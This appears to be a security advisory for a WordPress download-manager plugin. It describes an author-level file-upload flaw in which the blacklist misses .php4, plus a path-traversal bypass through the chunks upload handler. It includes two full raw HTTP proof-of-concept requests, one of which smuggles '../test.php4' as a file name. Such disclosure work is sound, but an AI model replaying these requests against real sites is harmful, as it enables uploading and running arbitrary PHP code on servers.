The wpdm_admin_upload_file AJAX action used a blacklist approach to forbid potential dangerous files, such as PHP, from being uploaded. However, other dangerous extensions, like .php4 were not forbidden.
As an author (or any account with the upload_files capability), attach a .php4 file to a download (/wp-admin/post-new.php?post_type=wpdmpro) POST /wp-admin/admin-ajax.php HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315 Content-Length: 518 Connection: close Cookie: [author+] -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="_ajax_nonce" 922675e67c -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="action" wpdm_admin_upload_file -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="package_file"; filename="test.php4" Content-Type: text/php <?php echo 'FAILED'; ?> -----------------------------380248545020708884002749165315-- The file will be located at https://example.com/wp-content/uploads/download-manager-files/test.php4 Even though the plugin has an .htaccess to prevent access to files in /uploads/download-manager-files/, (which will only work on Apache web servers, leaving IIS and Nginx unprotected), the protection can be bypasssed via a path traversal vector to make the file go in another arbitrary folder when using the chunks handler POST /wp-admin/admin-ajax.php?chunks=1 HTTP/1.1 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------380248545020708884002749165315 Content-Length: 634 Connection: close Cookie: [author+] -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="name" ../test.php4 -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="_ajax_nonce" 922675e67c -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="action" wpdm_admin_upload_file -----------------------------380248545020708884002749165315 Content-Disposition: form-data; name="package_file"; filename="whatever" Content-Type: text/php <?php echo 'FAILED'; ?> -----------------------------380248545020708884002749165315-- The file will be at https://example.com/wp-content/uploads/test.php4 and accessible to anyone
UPLOAD
2021-04-30 (about 1 years ago)
2021-04-30 (about 1 years ago)
2021-04-30 (about 1 years ago)